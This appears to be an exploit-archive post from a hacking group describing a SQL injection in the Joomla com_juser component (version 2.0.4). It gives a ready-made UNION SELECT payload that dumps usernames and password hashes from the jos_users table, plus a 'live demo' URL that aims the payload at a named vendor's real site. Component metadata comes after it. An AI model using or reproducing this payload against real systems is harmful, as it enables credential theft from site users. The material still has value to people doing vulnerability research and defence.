################################################### [+] Author : Chip D3 Bi0s [+] Author Name : Russell... [+] Email : chipdebios[alt+64]gmail.com [+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua [+] Group : LatinHackTeam [+] Vulnerability : SQL injection [+] Google Dork : imagine ;) [+] Email : chipdebios[alt+64]gmail.com ################################################### Example: http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code] ------ SQL code: +and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- ----- DEMO LIVE: http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <creationDate>25.05.2007</creationDate> <author>Joomlaequipment</author> <copyright>Joomlaequipment"&#169;2007</copyright> <license>Comercial</license> <authorEmail>support@joomlaequipment.com</authorEmail> <authorUrl>http://joomlaequipment.com</authorUrl> <version>2.0.4</version> <description>Registration Manager</description>